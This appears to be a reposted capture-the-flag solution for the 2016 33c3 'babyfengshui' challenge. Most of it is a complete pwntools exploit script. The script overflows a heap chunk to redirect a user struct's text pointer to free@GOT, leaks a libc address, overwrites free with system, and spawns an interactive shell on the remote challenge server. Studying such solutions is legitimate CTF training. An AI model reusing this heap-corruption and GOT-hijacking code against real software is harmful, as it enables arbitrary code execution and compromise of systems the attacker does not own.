babyfengshui_33c3_2016

2022-01-27 18:02:13  Views: 156  Source: Internet

Tags: 33c3 ru IO struct babyfengshui file sl 2016 p64


Takeaway: tamper with the address of the middle name array (user 1's struct) to leak, then attack.

from pwn import *
context.log_level = 'debug'
# context.arch = 'amd64'
libc = ELF('./libc-2.23.so')
file = './babyfengshui_33c3_2016'
elf = ELF(file)
shellcode = asm(shellcraft.sh())  # unused: the exploit below goes through system() via the GOT instead

local = 0
if local:
    io = process(file)
else:
    io = remote('node4.buuoj.cn', 28340)

def debug():
    gdb.attach(io)

# Template helper that builds a fake 64-bit _IO_FILE struct. Kept from the author's
# template; it is not used by this exploit (the target is a 32-bit binary).
def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    file_struct = p32(_flags) + \
             p32(0) + \
             p64(_IO_read_ptr) + \
             p64(_IO_read_end) + \
             p64(_IO_read_base) + \
             p64(_IO_write_base) + \
             p64(_IO_write_ptr) + \
             p64(_IO_write_end) + \
             p64(_IO_buf_base) + \
             p64(_IO_buf_end) + \
             p64(_IO_save_base) + \
             p64(_IO_backup_base) + \
             p64(_IO_save_end) + \
             p64(_IO_marker) + \
             p64(_IO_chain) + \
             p32(_fileno)
    file_struct = file_struct.ljust(0x88, b"\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, b"\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, b'\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, b"\x00")
    return file_struct

# I/O shorthands
r = lambda : io.recv()
rx = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x)
rud = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
li = lambda name,x : log.info(name+':'+hex(x))
shell = lambda : io.interactive()

# Menu wrappers. Each user is a text chunk (size chosen by the caller) plus a
# 0x80-byte struct holding the text pointer followed by the name array.
def add(description_size,name,text_size,text):   # option 0: create a user
    ru('Action: ')
    sl('0')
    ru('size of description: ')
    sl(str(description_size))
    ru('name: ')
    sl(name)
    ru('text length: ')
    sl(str(text_size))
    ru('text: ')
    sl(text)

def show(idx):                                   # option 2: print a user's name and text
    ru('Action: ')
    sl('2')
    ru('index: ')
    sl(str(idx))

def edit(idx,text_size,text):                    # option 3: rewrite a user's text
    ru('Action: ')
    sl('3')
    ru('index: ')
    sl(str(idx))
    ru('text length: ')
    sl(str(text_size))
    ru('text: ')
    sl(text)

def free(idx):                                   # option 1: delete a user (frees text, then struct)
    ru('Action: ')
    sl('1')
    ru('index: ')
    sl(str(idx))

free_got = elf.got['free']
add(0x80,'aaa',20,'a') #0
add(0x20,'aaa',20,'a') #1
add(0x40,'/bin/sh\x00',20,'/bin/sh\x00') #2   # text is "/bin/sh" so free(2) becomes system("/bin/sh") later
free(0)
# After free(0), text0 and struct0 (0x88 + 0x88 chunks) consolidate into one 0x110 chunk,
# which add(0x108) hands back as user 3's text. The text write is longer than that chunk,
# so it runs on into user 1's chunks: text1's size field (0x29), text1's 0x24 usable bytes,
# struct1's size field (0x89), and finally struct1's first field, the text pointer,
# which is replaced by the address of free@GOT.
pay1 = 0x108*b'a' + p32(0x100) + p32(0x29) + p32(0)*9 + p32(0x89) + p32(free_got)
add(0x108,'aaa',len(pay1),pay1) #3
# show(1) now prints the 4 bytes at free@GOT, i.e. the resolved libc address of free().
show(1)
free_addr = u32(ru(b'\xf7')[-4:])   # read up to the 0xf7 high byte of the libc pointer, keep the last 4 bytes
li('free_addr',free_addr)
libcbase = free_addr - libc.sym['free']
li('libcbase',libcbase)
system = libcbase + libc.sym['system']
li('system',system)
# edit(1) writes through the hijacked text pointer: free@GOT <- system.
edit(1,len(p32(system)),p32(system))
# free(2) calls free(user2->text) == system("/bin/sh").
free(2)
shell()
#debug()

Source: https://www.cnblogs.com/lovezxy520/p/15850666.html
